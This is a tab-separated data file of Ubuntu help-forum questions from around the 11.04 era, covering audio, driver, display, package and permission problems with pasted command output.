55276	sound not working and on-board audio seems to not be present	i have built a computer with a gigabyte p67a-ud3-b3 motherboard . the hardware does not show up for the on-board audio . i am using ubuntu 11.04 . i believe the audio is realtek alc889 . any help would be greatly appreciated ! lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation 2nd generation core processor family pci express root port ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 82801 pci bridge ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation p67 express chipset family lpc controller ( rev 05 ) 00:1f.2 ide interface : intel corporation 6 series chipset family 4 port sata ide controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 05 ) 00:1f.5 ide interface : intel corporation 6 series chipset family 2 port sata ide controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400gs ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) 04:00.0 pci bridge : integrated technology express , inc. device 8892 ( rev 10 ) aplay -l default playback/recording through the pulseaudio sound server pulse playback/recording through the pulseaudio sound server hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=1 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=2 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=3 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=7 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=8 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=9 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=7 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=8 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=9 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=7 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=8 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=9 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=7 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=8 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=9 hda nvidia , hdmi 0 hardware device with all software conversions
55277	how to input chinese in empathy ?	small problem here : i use ibus to input chinese , until now , everything works fine , but i ca n't input chinese in empathy . i 'm on gnome 3 , enjoying the integration of empathy with the de ( so i do n't want to install pidgin ) . can anybody help me please ?
55280	phpmyadmin is not working after i installed it	i am using ubuntu-11.04 . i followed these steps on this site : http : //www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-ubuntu-11.04-lamp so far my apache2 , php , and mysql are working fine except phpmyadmin ... whenever i run this : http : //localhost/phpmyadmin/ i get this error on my browser : not found the requested url /phpmyadmin/ was not found on this server . apache/2.2.17 ( ubuntu ) server at localhost port 80
55281	easiest way to package a directory of matlab scripts into a launchpad ppa	i 'm administering a small network of ubuntu boxes for a series of measuring machines in a laboratory . these machines depend on a small directory of matlab scripts in /usr/local/matlab/ ... in order to properly read data from a serial device . i would like to be able to maintain this bit of code on launchpad so that i could easily package this matlab script directory into a ppa and thus , easily maintain all of the computers in the lab ... so , i guess this could also be a debain/launchpad question , but -shrugs- . i 'm ready to upload the code to launchpad and setup a ./debian directory ... my question would be , what is the best way to package this simple directory of scripts so that it can work with launchpad 's auto-package system ? seems like there are a number of ways to do this ? what 's the best way to handle the debian directory ? what 's the best way to skin the cat ? i have experience doing this with other source code , and have maintained other projects through launchpad . but never done anything as simple as `` just put this directory into '/usr/local/matlab ' . i also realize that i would not be able to put matlab as a dependence of this package of custom scripts . does this make sense ? thank you for your help !
55283	xmodmap periodic resets on xubuntu	i 'm running xubuntu 11.04 and i 'm using a keyovation mac compatible gold touch keyboard . because the weird ordering of ctrl , option , and the apple key , i wanted to remap the keys to my liking using xmodmap . here 's the settings file i 'm using . remove mod4 = super_l remove mod4 = super_r remove control = control_l remove control = control_r remove mod1 = alt_l remove mod1 = alt_r keysym control_l = super_l keysym control_r = super_r keysym super_l = alt_l keysym super_r = alt_r keysym alt_l = control_l keysym alt_r = control_r add control = control_l add control = control_r add mod4 = super_l add mod4 = super_r add mod1 = alt_l add mod1 = alt_r it works great when i call xmodmap on it . however , after a few minutes , the settings will no longer work and revert to the default settings and i have to call xmodmap again to get it to work . what could be the causes for this ? i 've tried looking around a bit for this problem with little success . one guy claimed that he got around this by removing scim and i prefer not to do that . thanks in advance
55285	`` htmlconverter does n't exist . '' error when installing sun java 6	i 'm new to ubuntu and java . how do i correct this ? freestyler @ freestyler-hp-probook-4420s : ~ $ sudo apt-get install sun-java6-jdk reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-2.6.35-22 linux-headers-2.6.35-22-generic use 'apt-get autoremove ' to remove them . suggested packages : sun-java6-demo openjdk-6-doc sun-java6-source the following new packages will be installed : sun-java6-jdk 0 upgraded , 1 newly installed , 0 to remove and 14 not upgraded . need to get 0b/19.7mb of archives . after this operation , 61.2mb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package sun-java6-jdk . ( reading database ... 194375 files and directories currently installed . ) unpacking sun-java6-jdk ( from ... /sun-java6-jdk_6.21dlj-0ubuntu1~maverick1~ppa1_i386.deb ) ... sun-dlj-v1-1 license has already been accepted processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for doc-base ... processing 1 added doc-base file ( s ) ... registering documents with scrollkeeper ... processing triggers for python-support ... setting up sun-java6-jdk ( 6.21dlj-0ubuntu1~maverick1~ppa1 ) ... update-alternatives : error : alternative path /usr/lib/jvm/java-6-sun/bin/htmlconverter does n't exist . dpkg : error processing sun-java6-jdk ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : sun-java6-jdk e : sub-process /usr/bin/dpkg returned an error code ( 1 )
55289	how do i log in and access ubuntu one ?	i know it sounds like a dumb question , and problems should be addressed in the faq or the forum . but ubuntu one seems to resist all attempts to actually log in and access its services . recap of what i 've tried : i created an ubuntu one account a long time ago , and i 'd like to be able to access it . if i go the sign in or sign up link at the ubuntu one page , a blank page loads . nothing happens . i re-installed ubuntu 10.04 a short while ago . my choice of desktop environment is kde . i did find this page online . but when i follow the instructions , my installation of apt ca n't find the repository . i found a page for another client , kde client for ubuntu one , but this product seems to be in early alpha , and it was released a long time ago . i fired up nautilus , but poking around , i ca n't seem to find a way to connect to an ubuntu-one account . i fired up gnome-panel , and opened up the preferences for ubuntu one . when i click on manage account , i get a blank page . looking at ubuntu one 's faq , i see that there is an article addressing problems logging in via the gnome ubuntu one preferences manager , so i tried to follow the instuctions . it instructs to open the 'password and encryption keys ' manager from the gnome panel , and make changes to ubuntu one settings . the entry i 'm supposed to change is absent . so , how do i actually access my account ? preferrably from kde ?
55290	how do i add a slider to an appindicator ?	i 'm trying to add a slider to an appindicator similar to what the sound menu has . i 've looked trough the code of the sound menu and found that i should be using libido-0.1 for that . here 's what i have so far and all i see is a '- ' symbol in the menu . indicator_menu = gtk_menu_new ( ) ; ido_slider_widget = ido_scale_menu_item_new_with_range ( `` brightness '' , ido_range_style_default , 0 , 0 , 100 , 1 ) ; ido_scale_menu_item_set_primary_label ( ido_scale_menu_item ( ido_slider_widget ) , `` brightness '' ) ; ido_scale_menu_item_set_style ( ido_scale_menu_item ( ido_slider_widget ) , ido_scale_menu_item_style_label ) ; ido_scale_menu_item_set_primary_label ( ido_scale_menu_item ( ido_slider_widget ) , `` - `` ) ; ido_scale_menu_item_set_secondary_label ( ido_scale_menu_item ( ido_slider_widget ) , `` + `` ) ; gtkmenuitem *menu_slider_item = gtk_menu_item ( ido_slider_widget ) ; gtk_menu_append ( indicator_menu , gtk_widget ( menu_slider_item ) ) ; gtk_menu_append ( indicator_menu , gtk_menu_item_new_with_label ( `` dfdsfds '' ) ) ; gtk_widget_show_all ( indicator_menu ) ; gtk_widget_show_all ( ido_slider_widget ) ; app_indicator_set_menu ( indicator , gtk_menu ( indicator_menu ) ) ; thank you in advance for any posible answers .
55293	back up /home from a live cd	i need to back up the /home to a different location . how to do it ? /home is in a seperate parition with '/home` folders of other distros as well ? i need to backup them all before i do anything else .
55299	what file is the package description in ?	i am wanting to fix a typo in a package description , however i do n't know how to access this information . i can see it using the apt-cache show command , but where does the package manager actually get this info ? i have scoured the source thinking it might pick it up from a config , or man but no dice . any ideas ?
55300	how can i tell which driver my system is using ?	how do i know which drivers my system is using ( e.g . my ndiswrapper driver vs. the bundled driver ) ?
55304	to remove duplicates from two ubuntu 11.04 installations	i usually use dual boot with winxp and ubuntu 11.04 , but few days ago , one colleague made a mistake by installing again ubuntu 11.04 on same partition where already it was present . and before that i had updated the ubuntu 11.04 , but in new installation , i had to do again , as prompted by the system . and in grub boot loader , the list of os shows following : 1.ubuntu 2.previous linux 3.winxp . so , how can i clean up my ubuntu disk space by removing duplicates files from new ubuntu installation , caused by previous linux installation .
55305	how to install gnome3 in future versions of ubuntu ?	in natty you can install gnome 3 via a ppa . for future versions such as ubuntu 11.10 , how would i install gnome 3 ?
55306	amd catalyst 11.7 with external monitor	just installed catalyst 11.7 at times overheating when in games and external monitor works only in mirror mode . when i try to change monitor settings , it completely hangs the system . after reboot shows error , something like `` error on line 1 on symbol 1 '' or kind of that . with open-source drivers everything were fine , but with catalyst external monitor works only in mirror mode . what can i do ?
55310	import certificates in ubuntu 's jdk	i was able to import the certificates to mozilla and chrome , and i can access the link under ssl , but i need to connect to a server within an java web application , and i have to import de certificate file in cacerts , i hope so , not having so much experience with ssl , but i do n't know how . i tryied already a few tutorials from internet on how to import with keystore , and converted with openssl into few formats , but i am unable to import them . any help would be welcome . my certificates are in .pem , .pfx , .crt , .crl , .jks formats
55311	need to change the resolution options	i 've been trying to add my external monitor 's native resolution ( 1680x1050 ) . it does not show up on the gui `` monitors '' i followed the `` adding undetected resolutions '' section of https : //wiki.ubuntu.com/x/config/resolution here is what i got : chris @ chris-laptop : ~ $ cvt 1680 1050 # 1680x1050 59.95 hz ( cvt 1.76ma ) hsync : 65.29 khz ; pclk : 146.25 mhz modeline `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync chris @ chris-laptop : ~ $ xrandr -- newmode `` 1680x1050_60.00 '' 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync chris @ chris-laptop : ~ $ xrandr -- addmode vga-0 1680x1050 xrandr : can not find mode `` 1680x1050 '' chris @ chris-laptop : ~ $ xrandr -- addmode vga-0 1680x1050 xrandr : can not find mode `` 1680x1050 '' chris @ chris-laptop : ~ $ xrandr -- addmode vga-0 1680x1050_60.00 chris @ chris-laptop : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga-0 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 1680x1050_60.00 60.0 lvds connected ( normal left inverted right x axis y axis ) 1280x800 60.0 + 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 the example was as follows : $ cvt 800 600 # 800x600 59.86 hz ( cvt 0.48m3 ) hsync : 37.35 khz ; pclk : 38.25 mhz modeline `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync $ xrandr -- newmode `` 800x600_60.00 '' 38.25 800 832 912 1024 600 603 607 624 -hsync +vsync $ xrandr -- addmode s-video 800x600 i tried to use exactly what they had ( replacing 800x600 with 1680x1050 ) , but it did n't recognize 1680x1050 as a mode . so i tried 1680x1050_60.00 which did n't give me an error message , but also did n't add it to xranr .
55312	how to save php file in /opt/lampp/htdocs without going to terminal and type sudo gedit ?	i am very new to ubuntu and i still do n't understand alot of basic concepts so pls bear with me . i successfully installed xampp 1.7.4 in my ubuntu 11.04 . the xampp is installed in /opt/lampp . i know how to write php file in /opt/lampp/htdocs using the bash terminal command sudo gedit /opt/lampp/htdocs/myphpfile.php but what if i already have an existing php file inside a folder ? of course i do n't want to write it again using sudo command . all i want to do is copy that foler that contains the php files inside htdocs like i always do in windows wamp . is there a command in which i could set the /opt folder to writable ? please help me .
55316	changed files are not recognised on mounted drive	i have ubuntu 11 server installed as a virual machine using vmware fusion . some of my files are on the mounted drive /mnt/hgfs in order to be shared with my mac . everything works fine until i change any of the files on the mounted drive . for example when doing a reboot and then a : $ ll /mnt/hgfs/public/index.php it returns : -rw-r -- r -- 1 501 dialout 251 2011-08-01 01:59 /mnt/hgfs/public/index.php but when i change the file on the mounted drive and then again $ ll /mnt/hgfs/public/index.php the output is : ls : can not access /mnt/hgfs/public/index.php : invalid argument whats wrong here ? i mounted the drive with $ sudo mount -t vmhgfs -v -o ro .host : /my-app /mnt/hgfs
55319	firefox freezes while opening multiple tabs	i’m running ubuntu 11.04 ( 32-bit version ) on my laptop asus k42j just couple weeks and regularly having issues with firefox – it has freezes sometimes when you opened multiple tabs . the screen become to light cloudy appearance for about half a minute ( or something like that ) , during this time you can’t do nothing . i had looked through some posts there and found several similar issues , but mentioned tricks with changing of firefox’ options ( deleting history e.t.c . ) doesn’t help . i’ll be appreciated for any help on mentioned matter
55324	ubuntu one did n't accept my email	i wanted to try ubuntu one to see if it 's better than dropbox . so try to create an account . i used the built in software in 11.04. it worked fine until i filled my email address . i got the red warning sign saying it was something wrong , but i checked they were the same and everything else was correct . i then tried to use the ubuntu-one site but that failed as well since the `` anti-robot-thing '' never showed up ! i have an asus 1201n with ubuntu 11.04 64-bit desktop .
55325	how to use `` grep '' command to find text including subdirectories	i want to find all files which contain a specific string of text . the grep command works , but i do n't know how to use it for every directory ( i can only do it for my current directory ) . i tried reading man grep , but it did n't yield any help .
55326	ubuntu 11.04 dual monitor issue	hello i have a laptop 15 ' and was going to use 23 ' external monitor . i attached it and they both were working fine . but what i wanted is just to use only one monitor and leave laptop 's display to be turned off . i could n't find a way to do it and after playing with settings i turned first monitor off hoping that system decides to use the second one as main monitor . however they both are now showing black . i am having to detach my second monitor and restart my machine ( from another terminal 's console ) what i want..is just turn laptops monitor off and use 23 ' one when it 's attached . i would also be quite happy if you would tell me where does ubuntu store settings about monitors . i also would to at least to be able to use two monitors at the same time ( i.e revoke my last change )
55330	will my windows partition be affected if i re-install ubuntu ?	i am new to ubuntu . i recently changed all permissions of the /etc directory in order to edit the hosts file . after that , i realized it was a big mistake . i 'm also running ubuntu along side windows7 ( dual boot ) . since i changed those permissions , i had to re install ubuntu because i was not able to use sudoers . is my windows 7 os affected by the command i executed ?
55334	how i can get unity interface on ms windows system ?	i have ubuntu installed as primary system on my computer . so , i 'm pretty used to the unity , mainly indicators and dash , launcher is set on always visible in compiz settings , and i 'm waiting till somebody figures out how to get it to bottom of the screen as i would prefer it this way , but i 'm fine with how it is now , i think the gobal menu should be selectable feature , and through other tip i had changed the position of window buttons . it also has significant eye-candy . however , i 'm forced to have windows xp and 7 system installed alongside , as wine api is n't advanced enough to run some applications without open-source alternative , and , mainly , games my relatives play , at the time of asking ( 11/8 ) . so , when i have to use windows , i 'm quite lost . however , if i had unity also on both windows system , it would improve consistency , and i could use what i know from ubuntu as my primary system ! my relatives also admire unity , so , it would definitively help me . thanks !
55335	the contacts in skype are going offline continuously	skype is very glitchy for me ( fresh installed ubuntu 11.04. , 32-bit version , laptop asus k42j ) . my contacts appears on-line for a short time and then goes offline again ( almost every 5minutes ) . i doubt that itâs a network issue , because on my another laptop skype works good under windows 7 . i found something similar ( but actually is not the same case ) here skype 2.2.0.25 keeps going off had tried to delete shared.xml file but with no result thanks in advance for any suggestions how to fix it
55340	upgrade ati catalyst control center	twice now an upgrade of the proprietary ati catalyst driver has been a major pain , even with the help of excellent guides . these commands all run successfully ( as in $ ? -eq 0 ) : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* \ xorg-driver-fglrx sudo apt-get install build-essential cdbs fakeroot dh-make debhelper \ debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 \ dh-modaliases # already installed sudo apt-get install ia32-libs # ditto sudo sh ./ati-driver-installer-11-7-x86.x86_64.run -- buildpkg ubuntu/natty sudo dpkg -i fglrx*.deb after a restart it crashed during the graphical boot phase . restarted in safe mode , and restored the old configuration : sudo mv /etc/x11/xorg.conf { .fglrx-n , } now it boots , and goes straight into the correct video mode , but the version number shown in ccc still says 11.5 ! tried uninstalling the drivers , and noticed some warnings : dpkg : warning : while removing fglrx , directory '/usr/lib32/fglrx ' not empty so not removed . dpkg : warning : while removing fglrx , directory '/usr/lib/fglrx/etc/ati ' not empty so not removed . dpkg : warning : while removing fglrx , directory '/usr/lib/fglrx/etc ' not empty so not removed . dpkg : warning : while removing fglrx , directory '/usr/lib/fglrx ' not empty so not removed . tried to install without generating the packages : sudo sh ... /ati-driver-installer-11-7-x86.x86_64.run it says the packages are still installed ! verified with the following command : $ apt-cache pkgnames -- installed | grep fglrx fglrx fglrx-dev fglrx-amdcccle what can i do at this point ? i even tried to remove the /usr/lib32/fglrx and /usr/lib/fglrx directories , but that did n't help .
55352	convert library of wma tracks to mp3 's ?	i know there are options such as sound converter for doing them one track or directory at a time , but are there any tools that will recursively crawl through a directory 's subdirectories and convert all wma 's to mp3 's ? i basically would like to let it loose on my ~/music and let it do its thing without me manually having to give it one subdirectory at a time .
55355	where is the changelog for ubuntu kernels ?	where can i find the changelog between versions of the kernel released for ubuntu 10.04 ? note that i need to find the changelog for 10.04 from an 11.04 system , so if i have to , i can run a vm for this purpose . `` why do i need the kernel changelog ? '' you may ask . i need it because i 'm going to package a custom build of the kernel for myself onto a ppa i own , and i need the changelog to show my changes to the kernel in addition to all previous changes done by the ubuntu developers .
55359	how to restore windows bootloader that does n't let windows boot after ubuntu 11.04 installation ?	i installed ubuntu 10.10 and chose the option of installation `` alongside windows '' . then i chose a drive where windows 7 , 64 bit was already installed . this drive had a capacity of 150gb . ubuntu divided it into 100+50 . i went along with that and installed ubuntu 10.10 successfully . while booting windows 7 loader shows in the boot screen , but it does not boot after selecting the option and pressing enter . no error message is given , the screen just gets black and goes back to the operating system choice menu . now i upgraded ubuntu to 11.04 . i have windows 7 , 64 bit and wiindows 7 , 32 bit in two separate drives of mine . windows 7 , 64 bit is on the primary partition , while the 32 bit version is installed on an extended partition . i want to keep all the three operating systems . please suggest me the best way to keep tem . i have already tried windows 7 's start up repair . but no gain . i also rebuild boot using testdisk .
55360	ubuntu one music store match service ?	does the ubuntu one team plan to incorporate a service like itunes match into the ubuntu one music store ?
55367	how to copy themes ?	i tried to do something similar to this : how can i install 10.10 's light themes in 10.04 ? i installed the updated .deb , and then i took the /usr/share/themes/ambiance/* from a 11.04 machine and put it in /usr/share/themes/ambiance-natty/* on my 10.04 machine . for some reason the copying changed a bunch of permissions , and even changed the file name index.theme to ambiance.desktop or something . i changed that back to how it was in the previous system . under systemâpreferencesâappearances i now see the ambiance-natty option ... however selecting it does absolutely nothing ! nothing changes at all . what is going on here ? why did copying the directory ( to a flash drive and back ) change the persmissions and that one file name ? why does n't the theme work ? is there a log to check error messages or something ? i obviously do n't understand how themes work in ubuntu , so some explanation/overview would be wonderful as well .
55373	reload package list - > downloading translation ... failed	when using synaptic with ubuntu 11.04 , it always tries to download lots of translation repositories , but the calls fail . this has n't happened for me with earlier versions of ubuntu . it 's pretty annoying , because this often causes the package list reloading to take quite some time . when reloading the packages with aptitude , the situation is similar : there , it does n't `` fail '' , but it prints [ ignored ] for each of them . there 's no special `` translations '' entry in my /etc/apt/sources.list . screenshot : my /etc/apt/sources.list : deb http : //us.archive.ubuntu.com/ubuntu/ natty main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty main restricted deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ natty universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-security main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-security main restricted deb http : //us.archive.ubuntu.com/ubuntu/ natty-security universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-security universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-security multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-security multiverse deb http : //archive.canonical.com/ubuntu natty partner deb-src http : //archive.canonical.com/ubuntu natty partner deb http : //extras.ubuntu.com/ubuntu natty main deb-src http : //extras.ubuntu.com/ubuntu natty main
55375	how does nautilus decide what is a local file and what is not ?	nautilus properties offer the choices never , local files only and always for generating previews for files . how does it decide what is a local file , and what is not ? what i 'm trying to do is get more detailed control over what folders get thumbnails/previews generated . is there some config file i can change to get more detailed control over this ?
55376	white rectangles on screen	my screen frequently does n't refresh correctly and white rectangles remain . what can i do ? my graphics adapter is 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( printed by lspci ) i am using ubuntu 11.04 in the classic session , with no effects . [ update ] natty uses intel video driver version 2.14 . i downloaded the sources for the oneiric version , which is 2.15 , from packages.ubuntu.com . compiled the kernel module and installed it using make install . i copied the file *intel_drv.so* , which was located in a directory inside /usr/local/lib , to the corresponding /usr/lib directory and renamed the existing *intel_drv.so* file . xorg.0.log now shows driver version 2.15 , but the problem still occurs . maybe i made a mistake or missed something ? here are two screenshots that illustrate the bug at 1366x768 and 1024x768 :
55378	combine cabal and checkinstall	suppose i have a program which i can install via cabal , for example cabal install pandoc is it possible to use checkinstall to make a .deb package out of this and install it in a second step via dpkg ?
55381	will using xubuntu decrease my power usage ?	i am battling with the absurd power usage of ubuntu 11.04 . on windows 7 ( which came preinstalled ) i can get around 4:30 hours turning everything off ( wifi , bluetooth , lowest brightness for screen ) with same settings i get 2 hours with ubuntu . i was wondering if i install xubuntu will that help me reduce my power usage ?
55383	how do i set up the permissions on an automounted usb drive in 11.04	under 10.04 it was possible to use the gconf-editor system/storage setting to specify the default permissions for vfat and ntfs file systems when a usb drive was mounted . that seems to be missing in 11.04 in gconf-editor and dconf-editor . the automount gives no permissions to other users and groups to access the files and programs such as mediatomb can not access files on a usb drive unless i format it in ext3 . how can i change the permissions at or after mounting - any change does not seem to be sticky on a ntfs or fat32 usb drive .
55393	error in a gconf .entries file breaks my package manager	i probably was out of my mind , i tried editing the /usr/share/gconf/defaults/05_panel-default-setup.entries file by hand , i messed up and finally whenever i try to install/remove anything i am getting a huge error msg like this one please help i swear i wo n't do it again reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libmono-getoptions2.0-cil libwildmidi0 libgio-cil libsoundtouch1c2 g++-4.4 sendmail-base libcodeblocks0 m4 libstdc++6-4.4-dev pidgin-data procmail libx264-98 sensible-mda sendmail-cf idle-python2.6 codeblocks-common libebml2 libmatroska2 libiptcdata0 use 'apt-get autoremove ' to remove them . the following packages will be removed : pidgin pidgin-libnotify 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 10 not fully installed or removed . after this operation , 1,810 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 292449 files and directories currently installed . ) removing pidgin-libnotify ... removing pidgin ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for menu ... processing triggers for python-support ... setting up gconf2 ( 2.32.2-0ubuntu2 ) ... /tmp/gconf-j2qkem/temp.entries:40 : parser error : opening and ending tag mismatch : entry line 40 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:44 : parser error : opening and ending tag mismatch : key line 40 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:70 : parser error : opening and ending tag mismatch : entry line 70 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:74 : parser error : opening and ending tag mismatch : key line 70 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:130 : parser error : opening and ending tag mismatch : entry line 130 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:134 : parser error : opening and ending tag mismatch : key line 130 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:195 : parser error : error parsing attribute name < key > < list < /key > ^ /tmp/gconf-j2qkem/temp.entries:195 : parser error : attributes construct error < key > < list < /key > ^ /tmp/gconf-j2qkem/temp.entries:195 : parser error : could n't find end of start tag list line 195 < key > < list < /key > ^ /tmp/gconf-j2qkem/temp.entries:273 : parser error : opening and ending tag mismatch : entry line 273 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:277 : parser error : opening and ending tag mismatch : key line 273 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:303 : parser error : opening and ending tag mismatch : entry line 303 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:307 : parser error : opening and ending tag mismatch : key line 303 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:321 : parser error : opening and ending tag mismatch : entry line 321 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:325 : parser error : opening and ending tag mismatch : key line 321 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:403 : parser error : opening and ending tag mismatch : entry line 403 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:407 : parser error : opening and ending tag mismatch : key line 403 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:475 : parser error : opening and ending tag mismatch : entry line 475 and key y > < schema_key > /schemas/apps/panel/objects/attached_toplevel_id < /schema_key > < /key ^ /tmp/gconf-j2qkem/temp.entries:479 : parser error : opening and ending tag mismatch : key line 475 and entry < /entry > ^ /tmp/gconf-j2qkem/temp.entries:481 : parser error : error parsing attribute name < key > < entrylist < /key > ^ /tmp/gconf-j2qkem/temp.entries:481 : parser error : attributes construct error < key > < entrylist < /key > ^ /tmp/gconf-j2qkem/temp.entries:481 : parser error : could n't find end of start tag entrylist line 481 < key > < entrylist < /key > ^ /tmp/gconf-j2qkem/temp.entries:531 : parser error : comment not terminated < ! -- < /key > < value > < string > trashapplet applet < string > trashapplet applet -- & gt ; < /string > ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : comment not terminated ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag key line 529 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 528 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 474 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 402 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 320 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 302 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 272 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 129 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 69 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag entry line 39 ^ /tmp/gconf-j2qkem/temp.entries:572 : gins ( -parser error : premature end of data in tag entrylist line 2 ^ /tmp/gconf-j2qkem/temp.entries:572 : parser error : premature end of data in tag gconfentryfile line 1 ^ dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of compiz-gnome : compiz-gnome depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing compiz-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of compiz-plugins-main : compiz-plugins-main depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing compiz-plugins-main ( -- configure ) : dependency problems - leaving 